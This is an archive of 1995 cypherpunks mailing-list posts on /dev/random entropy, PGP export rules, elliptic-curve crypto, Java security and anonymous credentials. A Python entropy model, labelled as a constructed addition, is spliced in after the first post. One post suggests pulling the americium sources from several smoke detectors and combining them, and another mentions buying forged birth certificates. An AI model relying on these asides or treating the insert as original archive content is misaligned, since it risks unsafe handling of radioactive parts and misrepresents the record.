available entropy have assumed that entropy gets used up; I'd like to 
propose that maybe it doesn't, at least in the computational-complexity
sense that says that you don't have the computational power around to
calculate the information inside /dev/random from the output,
giving a sort of "computational entropy" that reflects not only the 
uncertainty you have because of randomness but also the uncertainty
you have because of your computational limitations.

Most of the designs I've seen look like this:
        A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
        An input stream I = I1....Ik, which is mixed into R
        A mixing function F which is used to mix R <= F(R,I) 
                for some chunk of I, possibly empty.
        A hash function H, typically MD5.
        An output O = O1...Om = H(R), and E gets mixed after every output.
                (These are capital-o, not zero...)

The entropy E of the reservoir E before an output is
        -SUM(all X) p(X) log p(X)
where X is an event R1=x1, R2=x2 ... Rn=Xn
which is equal to n, assuming the Ri are iid equiprobable 0 or 1.

After an output, the entropy is
        - SUM p(X | H(R)=O) log p(X|H(R)=O)
which works out to n-m, since p(X) is zero if H(R)!=O, and 2**m/2**n if it does.
So that says you use up m bits of entropy if you get m bits of good output.

However, what I'd like to suggest is that you don't, from the perspective
of a user who doesn't have direct access to the reservoir R of random bits.
For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
the user is neither able to invert H, nor to enumerate all possible R,
nor to calculate anything useful based on multiple outputs, since the
reservoir R is shuffled between outputs; even a simple circular shift
may be enough.   This doesn't apply to the case where n is 32 or 48
and the hash function produces n-bit outputs, or even m<<n bit outputs,
because that may be inverted or brute-forced, but it seems to apply
for the case where n is sufficiently large and the hash is good.
If the hash is simpler than MD5, it may apply anyway, since the hash
produces far fewer bits than its input, as long as the hash and the
mixing function don't give away any information about the reservoir
between successive outputs.

This would suggest that /dev/random ought to have a mode that says
"give me output of whatever quality you have available",
and that it ought to be OK to use it, as long as the reservoir has 
been seeded with sufficient high-entropy input to have decent randomness.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
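
The entropy accounting in the post above, worked through on a reservoir small enough to enumerate. This is an added example, not part of the original message or of any /dev/random implementation; the toy sizes (n = 12, m = 4), MD5 truncated to m bits as H, and a 1-bit circular shift as the shuffle are assumptions chosen so that every reservoir state can be listed.

```python
"""Toy model of the reservoir design described in the post (constructed)."""
import hashlib
import math
from collections import Counter

N_BITS = 12   # assumed toy reservoir size n (the post uses 1024 or 4096)
M_BITS = 4    # assumed toy output size m (full MD5 would give 128)


def H(r, n_bits=N_BITS, m_bits=M_BITS):
    """Hash an n-bit reservoir value and keep the top m bits of MD5."""
    raw = r.to_bytes((n_bits + 7) // 8, "big")
    digest = hashlib.md5(raw).digest()
    return int.from_bytes(digest, "big") >> (128 - m_bits)


def rotl(r, n_bits=N_BITS, k=1):
    """Circular left shift: the 'simple' shuffle applied between outputs."""
    k %= n_bits
    mask = (1 << n_bits) - 1
    return ((r << k) | (r >> (n_bits - k))) & mask


def outputs(r, count, n_bits=N_BITS, m_bits=M_BITS):
    """Emit `count` outputs O = H(R), shuffling R after each one."""
    outs = []
    for _ in range(count):
        outs.append(H(r, n_bits, m_bits))
        r = rotl(r, n_bits)
    return outs


def preimage_sizes(n_bits=N_BITS, m_bits=M_BITS):
    """For each output value, how many reservoir states hash to it."""
    return Counter(H(r, n_bits, m_bits) for r in range(1 << n_bits))


def avg_entropy_after_one_output(sizes, n_bits=N_BITS):
    """Average over O of -SUM p(X|H(R)=O) log p(X|H(R)=O).

    Given H(R)=O, R is uniform over the preimage of O, so the entropy for
    that O is log2(preimage size); weight it by the probability of O.
    """
    total = 1 << n_bits
    return sum((c / total) * math.log2(c) for c in sizes.values())


def consistent_reservoirs(observed, n_bits=N_BITS, m_bits=M_BITS):
    """Every initial reservoir that would have produced `observed`.

    This is the enumeration an observer can only afford when n is small.
    """
    k = len(observed)
    return [r for r in range(1 << n_bits)
            if outputs(r, k, n_bits, m_bits) == observed]


def surviving_counts(secret, count, n_bits=N_BITS, m_bits=M_BITS):
    """Number of reservoirs still consistent after 1, 2, ... outputs."""
    observed = outputs(secret, count, n_bits, m_bits)
    return [len(consistent_reservoirs(observed[:k], n_bits, m_bits))
            for k in range(1, count + 1)]


if __name__ == "__main__":
    sizes = preimage_sizes()
    print("entropy before output:", N_BITS, "bits")
    print("average entropy after one output: %.4f bits (n-m = %d)"
          % (avg_entropy_after_one_output(sizes), N_BITS - M_BITS))
    secret = 0xABC  # constructed sample reservoir state
    for k, c in enumerate(surviving_counts(secret, 8), start=1):
        print("after %d outputs: %4d candidates, log2 = %.2f"
              % (k, c, math.log2(c)))
```

At the post's sizes (n of 1024 or 4096) this enumeration is not feasible, which is the gap between the n-m accounting and the "computational entropy" the post describes.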





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 5 Nov 1995 08:14:07 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
Message-ID: <199511050001.QAA09434@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


> This is kind of a risky policy to take. The general feeling I get that 
> allowing non green-card holders access to strong cryptography is sort of 
> decriminalised, in that the police aren't likely to break down your door 
> and have your AFS server accidentally fall down stairs. However, it is 
> still against the law, and could be used against the university in other 
> unrelated circumstances.

Actually, it's not.  There is precedent, in that at one point (rumour
mode on -- I have not verified this story) MIT was asked to not allow
certain students into the MIT nuclear reactor.  These international
students had been accepted into the Nuclear Engineering program, which
sort of requires them to have access.  MIT's response was to tell the
gov't that if they didn't want to let these students have access to
the nuclear reactor, then they should not be allowed in the country,
since MIT will not discriminate against students based on silly
criteria such as where they live.  The state department said they
couldn't do that, since they had nothing to keep the students out of
the country.  MIT responded that they couldn't do it either, and the
gov't backed down.

I'm not convinced that it is as risky as you say.  Besides, MIT does
have a lot of political power, so they are more likely to get away
with it than other places might.  However I think it is a reasonable
position for an educational institution to take.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 5 Nov 1995 05:19:52 +0800
To: cypherpunks@toad.com
Subject: re:using PGP only for digital signatures
Message-ID: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
  I am in a discussion (during the week) with a system administrator 
about seeing if we can just make PGP publicly available to everyone, 
but now the discussion seems to be to just allow PGP to do digital 
signatures, and I don't think that is the best choice, then.  They are 
not against PGP being used, but there are legal issues as to whether they 
can offer it to everyone, as some students are international students, 
and are not allowed to use the version for the US, or so I have been 
informed, so now I need to see if we can have the international version, 
so these students can use it. :(
  Are there any good programs (for the Unix, SunOS) that just do digital 
signature encryption?  What they are trying to do is make certain that no 
one can send a message to anyone, claim to be in the faculty, and cause 
problems that way.  My position is just a student programmer, but I am 
trying to learn as much as I can, to answer questions and deal with problems.
  Thanx.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 08:52:34 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: on topic!!
Message-ID: <199511050039.QAA02014@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 11/4/95 -0800, VZNuri wrote:
>if there were two key elements here, these conversations would probably
>largely go away (instead of continually reappear)
>- an unambiguous charter
>- an active moderator
>
>unfortunately I suspect that a moderator does exist but he "prefers
>to remain anonymous" ("pseudonymous"?). imho that is precisely 
>how *not* to succeed as a moderator.

As an alternative, there was the Cypherwonks list, which worked just that
way, and such conversations did rapidly go away :-)
What's evolved here instead are a couple of filtered lists,
such as cp-lite, where you can get the conversations that
one or another monitor considers relevant instead of the whole firehose.
It seems to work reasonably well for a lot of people.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 5 Nov 1995 09:10:47 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951104163531.19656J-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Bill Stewart wrote:

> Most of the designs I've seen look like this:
>         A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
>         An input stream I = I1....Ik, which is mixed into R
>         A mixing function F which is used to mix R <= F(R,I) 
>                 for some chunk of I, possibly empty.
>         A hash function H, typically MD5.
>         An output O = O1...Om = H(R), and E gets mixed after every output.
>                 (These are capital-o, not zero...)

I believe PGP uses this approach.  An implementation of it can also be
found in Crypto++ as randpool.cpp. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 5 Nov 1995 06:18:25 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SUN.3.91.951104170057.2588C-100000@fourier>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sat, 4 Nov 1995, Derek Atkins wrote:

> It is still illegal for them to export it, however any foreign
> national can walk up to any computer store and buy anything they wish,
> and take it on the plane with them.  Therefore, in an institution of
> higher learning, the same standards should be allowed.  If the
> government does not want your student to have access to possibly
> "dangerous" information, then they should not be allowed into the
> country at all.
> 
> Therefore, I say just make PGP available to your students.

  I'm trying, but all the legal angles need to be covered first.  This 
answer helped a great deal though.  Just remember, I am just an undergrad 
student. :)
  Thanx.

James Black





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 09:12:18 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951104165650.6970E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.
> 

And here we have the rub. People with permanent residency (i.e. green 
cards) are fully entitled to access to strong crypto. Most foreign 
students are on J-1 visas, which do not grant permanent residency. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 09:16:43 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: [ID point semi-off-topic] Re: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104163117.6549M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Pop Quiz: If you are a citizen of the U.S., prove it.
>...
> As has been said several times recently, for the purposes of law, non-U.S.
> citizens who reside in the U.S are effectively "U.S. persons." Subject to
> U.S. law and generally having the same legal rights. (Can't vote. Can be
> drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
> discriminate against the differently clued, etc.)

All true.

> Consider this: most people in the U.S. do not have a "credential" that
> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> passports.) They have driver's licenses, which say nothing about
> citizenship (at least California and Virginia licenses do not). Social
> Security cards are the same.
> 
> (Second hint: most people are hard-pressed to locate a birth certificate
> for themselves. Many people take the easy way out and simply buy a new one
> for the $25 a good one costs.)
> 
> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.

A green card, by itself, also fails to prove legal status.

Proving legal residency requires a combination of two documents, one each
from specified lists. Most commonly a driver's license, green card (which
is actually pink), or birth certificate from list A, and a social
security card from list B. 

Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
it's a Good Thing. Basically, for privacy and security reasons, it is a
very good idea to separate the issues of identity and authorization.

I don't care how securely you can authenticate who I am -- by PGP, retinal
scan, whatever. I do not want a single digitizable token to be the key to
my identity. Even if that identity cannot be forged (and everything can be
forged), it can be used to track me, by the government, by the Direct
Marketing Association, by the private investigators of certain wacky
cults, and by TRW. And I suppose by those secret government types at SAIC
who, we are told, control the Internet now :-)

It is a little inconvenient, but this is why it's a Good Thing that you
need a separate driver's license, social security card, credit card, phone
number, PGP key, password, thumbprint, and retina. I would oppose moves to
combine them to a single unified "mark of the beast," as it were. I am a
little uneasy about the otherwise very cool First Bank of the Internet for
this reason. If you use FBOI, I'd recommend using a PGP key separate from 
your usual PGP key.

Crypto fans need to recognize that the ability to securely prove your 
identity is not an unmitigated advance.

Of course, all the crypto fans here are also pseudonym fans.

> As to the point about students impersonating faculty, if the faculty starts
> signing their messages (doubtful), then no one can impersonate _them_.
> (Except that it sounds like all this PGP stuff is to happen on campus
> computers, in which case there are several ways their private keys and
> passphrases can be snarfed.) The issue of a "credential" for faculty
> members, something that says "This person is a member of the Foo U.
> faculty," well, this is a different kettle of fish; such credentials are
> not part of the PGP system, though webs of trust could in principle be used
> in a klugey kind of way.

This is a job for private key cryptography, like kerberos.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@mcs.net>
Date: Sun, 5 Nov 1995 07:21:11 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Version 2 Elliptic Curve Crypto
Message-ID: <Pine.BSI.3.91.951104165609.18788B-100000@Venus.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


Howdy,

	I blew it the first time, but the correct elliptic.2.tar now sits 
on ftp.csua.berkeley.edu/pub/cypherpunks/ciphers.  This version is twice 
as fast as eliptic.tar.  A newer version of the elliptic.2.doc is being
fixed right now, the only difference with what is posted is a correct 
reference to the CRYPTO '95 article on polynomial basis inversion.  Enjoy.

	For a compiled version on Sun or under Borland C++ contact Steve 
Albrecht (eh@mcs.com).  He is in the process of setting up macros to get 
this to compile under just about any unix system.  He's also fixed quite 
a few bugs and is cleaning up a bunch of uninitialized data structures 
that I didn't notice.  Last I heard it was working, so if you want to 
play on a specific platform, contact Steve directly.

	Hilarie Orman from U. Arizona (one of the authors of the CRYPTO 
'95 paper) thinks that calling elliptic curves "strong crypto" may be 
over selling it.  I'm not enough of a mathematician to know how to argue, 
but it seems to me that almost perfect random output is about as close to 
strong crypto as one could get.  Security thru obscurity doesn't work, 
elliptic curves are obscure and so far not studied to the same extent as 
RSA or DES.  However, I'll make the claim that elliptic curves are 
"strong crypto" until proven otherwise.

	Along those lines, does any one have a classic text to encrypt 
for a plaintext/ciphertext challenge?  I'll put something together and 
post it in the next few weeks.  I'll use the symmetric encryption 
subroutine.  If there is any interest, should I put out a public key 
challenge as well?  Note, I ain't rich, so only token prizes (like $50 
ecash and $50 real for each challenge).  The point is to check if this is 
credible crypto, that's all.

	E-mail replies to cryptech@mcs.com.  Thanks for reading this!

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mhkohne@discordia.org (Michael Kohne)
Date: Sun, 5 Nov 1995 06:43:57 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
Message-ID: <v02120d00acc195427273@[205.164.159.32]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:34 PM 11/3/95, Timothy C. May wrote:
>At 5:46 PM 11/3/95, Brad Dolan wrote:
>
>>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred
>>I think the following is the right phone number.
>>
>>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>>there, while others are spending much money avoiding radon.
>>
>>Anyway, the pillows make nice sources and good conversation pieces.
>
>I'd say they make poor sources. Far too large. A smaller source has better
>access to the detector without adding much to the overall background the
>user is exposed to. (I'm not saying low-level uranium or thorium sources
>are much of a hazard, but the fluence presented at the detector is very low
>for such an extended source.)

If it's a cheap source of higher-than-background radiation, try a smoke
detector. They are getting darn cheap these days, and my First Alert Model
83R says it contains 1.0 Microcurie of Americium 241. This should raise the
count rate significantly over background. And if one isn't enough, you could
always get several, remove the module with the radioactive materials in it
(it's a sort of black cylinder in mine) from several, and put them all in a
box with the radiation detector. As I remember, I bought 2 or three of these
detectors in a single package for about $15 3 years ago. They should be
quite cheap by now.

Although, I don't think it has the same sort of humor value as the pillow.
(What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJvmh4P3Pba7OSlRAQEDlwP8Cm4vryVejfJZoSd/amwFLxJZWYnPHNxS
3KCmw8jSKjFk4iF+wTvWAHbFIjjkKFGBLt6+BMbDt2eUM6R87mNay1nMASsCoweL
syDr4D39XDUGF6sw7TDulLTW62u7JKaCIGoBQU5+uU4Qxs3YA4QVVR+sLi885ngt
o0GEIeVgLw8=
=hNXr
-----END PGP SIGNATURE-----

----
Michael Kohne                  mhkohne@discordia.org or mhkohne@moberg.com
"Quantum mechanics is your friend"
Key fingerprint =  EE 22 9D 9B 32 5E F1 37  D2 B3 DC 78 19 24 D1 E8






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:19:07 +0800
To: cypherpunks@toad.com
Subject: Re: using PGP only for digital signatures
Message-ID: <acc13d911f021004b09f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Pop Quiz: If you are a citizen of the U.S., prove it.


At 11:33 PM 11/4/95, Simon Spero wrote:
>On Sat, 4 Nov 1995, Derek Atkins wrote:
>
>> student from coming to the US.  By allowing the student into the US,
>> the gov't is implicitly giving them the right to use PGP within the
>> US.
>
>This is kind of a risky policy to take. The general feeling I get that
>allowing non green-card holders access to strong cryptography is sort of
>decriminalised, in that the police aren't likely to break down your door
>and have your AFS server accidentally fall down stairs. However, it is
>still against the law, and could be used against the university in other
>unrelated circumstances.
>
>It seems that licences allowing foreign nationals access to cryptographic
>software within the US are pretty easy to get, and especially for
>something like PGP on a central machine.

We really need to put this one to bed.

As has been said several times recently, for the purposes of law, non-U.S.
citizens who reside in the U.S are effectively "U.S. persons." Subject to
U.S. law and generally having the same legal rights. (Can't vote. Can be
drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
discriminate against the differently clued, etc.)

All of the nonsense about wearing a "munitions shirt" in front of a
"foreigner" seems to miss this essential point.

Ditto for PGP use.

Consider this: most people in the U.S. do not have a "credential" that
shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
passports.) They have driver's licenses, which say nothing about
citizenship (at least California and Virginia licenses do not). Social
Security cards are the same.

(Second hint: most people are hard-pressed to locate a birth certificate
for themselves. Many people take the easy way out and simply buy a new one
for the $25 a good one costs.)

Therefore, there are few ways that citizenship can be "checked." Period. A
foreigner who wishes to "prove" his non-U.S. status could, of course, show
his green card. But this is different from proving citizenship.

As to the USF--or was it SFSU?--student worried about "allowing" PGP to be
used...I despair at this outlook. Why not simply ignore the issue, not
"give" them PGP, but instead have a few pointers to where PGP may be
gotten.

As to the point about students impersonating faculty, if the faculty starts
signing their messages (doubtful), then no one can impersonate _them_.
(Except that it sounds like all this PGP stuff is to happen on campus
computers, in which case there are several ways their private keys and
passphrases can be snarfed.) The issue of a "credential" for faculty
members, something that says "This person is a member of the Foo U.
faculty," well, this is a different kettle of fish; such credentials are
not part of the PGP system, though webs of trust could in principle be used
in a klugey kind of way.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:22:23 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <acc141f120021004b7ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 11/4/95, Bill Stewart wrote:

>Pointing the camera at a snowy TV or out the window or at a cat playing
>with catnip can generate much more randomness if you need it.

Which would make that "dev/cat," right?


--Klaus!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Nov 1995 10:12:55 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050203.SAA01370@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Todd Glassey <todd@lgt.com> writes:

> Pardon the flame but I really have just about heard enough of this BS...

No one needs to listen to anything if they don't want to, Todd, but I 
think that some things need saying none the less.

I think the old saying is: You can lead a horse to water, but you can't 
make him think, or something like that ...

>>This response came from Sun to Risks:
>>
>>> Date: Mon, 16 Oct 1995 21:22:40 -0700
>>> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
>>> Subject: Re: Risks in Java
>>>
>>> If we are going to "analyze" java security, let's keep in mind that
>>> there is an important distinction between the language (java) and the
>>> machinery which runs the java program. 

Hmm, this is a very interesting perspective, coming from Sun Engineering
as it were. The company that says that the Network is the machine, or
somesuch.  I always thought that security consisted of everything: 
hardware, software, and wetware. 

(Or it did the last time, I checked my handbook.)

Admittedly this is a horrible inconvenience, especially when it comes to
security. 

>>> Java is a general-purpose programming language along the lines of C/C++.
>>> So, there is no doubt that its expressive power overwhelms our 
>>> theoretician's abilities to predict java-programs behavior -- this is 
>>> where we start getting into the halting problem, computability and other 
>>> black magic.  Basically, i don't think we can "trust" programs 
>>> written in any *useful* programming language.
>>
>>Read: We can't trust Java programs.

This may well be true.  But sloppy design, design which ignores the most 
basic difficulties cannot be brushed away by simply saying that "it 
exceeds theoretician's predictive abilities."

That simply doesn't cut it.

"Ignoring the obvious" is simply that.  It's a planned process of
"ignoring the obvious". 

One example of this that should serve as a useful case study is a recent
problem which was brought to the Canadian public's attention just this
week, on a program called the Fifth Estate.  The CBC (Canadian
Broadcasting Corporation) detailed a software code problem in one of
AECL's (Atomic Energy of Canada Limited's) instruments which deliver
penetrating radiation. 

The software which controlled the radiation dose, would periodically
override the oncologist's calibration and deliver a radiation dose 100
times what was prescribed.  This software "bug" literally killed wherever
the machine was in use. 

A simple hardware solution engineered into the product as part of a
redundancy check program would not only have saved many lives, but could
have confirmed that there were serious code deficiencies.  A redundancy
program which AECL did NOT have. 

Then again AECL did not consider that it had to mathematically prove its 
code either.  So I guess, they "ignored the obvious" not once, but twice.

A simple lesson can be learned here, one which I believe is applicable to
Java. 

If your parameters are going to be that you cannot trust your production
code, then you MUST engineer on that basis, that the production will not
be trustworthy, rather than simply crying like Chicken Little, that
mission critical applications must simply "live with" engineered
inferiority. 

Or alternatively, another lesson could be pulled out:  To avoid this 
problem, ensure that your code is mathematically provable or utilize 
appropriate hardware overrides.

Case study, #2:  Netscape.

During their code design, they assumed that all servers on a network were
trustworthy and would continue to be trustworthy.  They designed their
product on that basis.  In fact, over time the very opposite will be true. 

As an exploitation algorithm propagates, the significant percentage of
servers which are NOT trustworthy will begin to grow exponentially. 

The true assumption which Netscape should have started with is a simple 
one, and is the only assumption that ANY production house can start 
with:  that the network has a reliable transport mechanism, one which will 
route around damage.  That's it.  Any other assumptions are poor design 
and engineering and are demonstrative of a misunderstanding of the 
environmental conditions in which the engineered product is expected to 
perform.

>Dr. Fred, you seem to spend a lot of energy slamming Java and HotJava. Are
>you unaware that the HotJava Platform is the first generation pass at an
>inline extensible GUI harness. Underline the total concept "extensible GUI
>harness". This includes a series of tool functions to *help* perform secure
>messaging (like those supplied in Netscape 2.0/Java.), but because of the
>enormity of the task and the number of facets on the face of this gem it
>will be some time before the final versions of the first generation will be
>available.

I can't speak for "Dr. Fred", but I always worry when people start to
refer to something as a "gem", and start talking about the "enormity of
the task".  Especially if an engineer starts talking in such lyrical,
flowery prose.

Enormous tasks always lead to complexity which can never be solved by
simple linear thinking.  And the engineer from Sun is right, that it will
be some time before first generation products are available.  

(This will certainly be the case if "mathematical proofs" become mandatory
as part of an ACT in Action plan.  )

>No one else had been working on this piece of technology before SMCC
>started their effort. From the word floating about the SMCC labs they
>didn't even know what they had.
>
>So rather than slamming them, SMCC, or their PR folks for

Well, I'd rather that marketers stick to marketing AFTER a product 
development cycle is completed.  Generally, you would think (hopefully) 
that people who are technologists, just *might* have a better knowledge 
of what they have, (or don't have) wouldn't you?

Maybe??  Or maybe not ...

After all you wouldn't want some kid, some little snotty brat, some kid
who started playing around well over a decade ago -- when he was in his
teens -- as a projadmin on one of Honeywell's Multiplexed Information and
Computing Service beasts showing you up for your temerity?  

Or would you cry about the "kid" slamming you? 

>I hope that you understand my point?. The net/net is that OLTP needs to be
>scaleable to be a saleable commodity and without the ability to do
>"java-ish" like local applets... There is no clean way to do this,

Well if we're gonna bottom line it, and talk turkey, and leave Chicken
Little back at the table, skewered as it were, I'll extend a helping hand. 

The net/net is really, really simple, a product that doesn't perform as
advertised is not a saleable commodity.  No one buys cars which don't
start or cans that leak.  Sure you can have a body by Pininfarina or one
by Alcan but if the engineering isn't there under that beautiful skin then
you don't have ANYTHING TO OFFER FOR VALUE. 

>As an aside - What blows my mind is the number of cycles people spend
>bitching and moaning about Java itself rather than working to create a
>better solution.

Well. It's just not my responsibility to create a solution.  And I have a
tendency not to "bitch and moan".  I might be one sarcastic castrating
SOB, but bitchy and moany is not something I'm routinely accused of. 

I simply have a reputation for a degree of frankness.  Nothing personal is
meant by it.  I'm actually a very nice person. 

Truly.;-I

>I just want to say "Get a clue. Moan about something that is important and
>pertinent to the technologies at hand".
>
>
>These comments are my own -

Appreciated.  And I mean that with sincerity that your comments are
appreciated.  I understand that each person here DOES express their
individual opinions.  Sometimes some very strong opinions.  Myself
included. 

Generally, wallflowers will not find comfort on this list.  We'll 
recommend that those people should stick to writing browser programs.

Oops, scratch that last thought ...

>Sincerely,
>Todd Glassey
>todd@lgt.com


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 10:51:28 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104181249.6549N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics, Rich unfortunately labeled
> his post "[ID point semi-off-topic]..." In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

Thanks for the newbie correction.

In case anyone else is new to this, I couldn't find that paper, but Chaum's
ideas and references are at http://www.digicash.com/publish/sciam.html

> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
> >
> >Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
> >it's a Good Thing. Basically, for privacy and security reasons, it is a
> >very good idea to separate the issues of identity and authorization.
> >
> >I don't care how securely you can authenticate who I am -- by PGP, retinal
> >scan, whatever. I do not want a single digitizable token to be the key to
> >my identity. Even if that identity cannot be forged (and everything can be
> >forged), it can be used to track me, by the government, by the Direct
> >Marketing Association, by the private investigators of certain wacky
> ....
> 
> Rich's (or Chris') points are admirable, but getting more and more
> irrelevant by the day. The notion of unlinking identity and authorization
> by separate pieces of identification is another form of "security through
> obscurity."

True. But until digital technology becomes ubiquitous, we're stuck with
it, and it does help. I see no analog, well, analog to credential 
technology. It absolutely requires machines that can generate and handle 
large random numbers. Right?

My point was, even people who should know better, like the managers and
clients of FBOI (fboi@netcom.com), are relying on security through appeal
to irrelevant crypto authority, which is even worse. Using your primary
pgp key as a traceable link to your credit card number or bank account can
be just as bad as publishing your credit card number. 
 
> Happily, Chaum's work on "credentials without identity," based essentially
> on the kind of "blinding" used in digital cash (with some differences, of
> course), allows for one to display a credential showing one is old enough
> to enter a bar or library (in 2005), without revealing a name (which is
> just another credential).

I haven't yet fully digested this concept, but don't you get into a bit of
a chicken-and-egg problem when you start applying this to things like
proof of age and citizenship? Until you reach a certain age, you're not
going to remember your passphrase. I still think there's a role for
private keys held by some authority (I realize that's not a popular word). 

I'd guess this would be addressed by a "secret sharer"/secsplit kind of
thing, where your parents hold a combination of keys that together can
represent your secret key until you're old enough to change it yourself. 
Still I'd worry about what kind of information was gathered about me in my
youth, and how that might be carried over into maturity. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:40:28 +0800
To: cypherpunks@toad.com
Subject: To Repeat: Credentials Not Considered Necessary
Message-ID: <acc151232102100449bf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:03 AM 11/5/95, Simon Spero wrote:
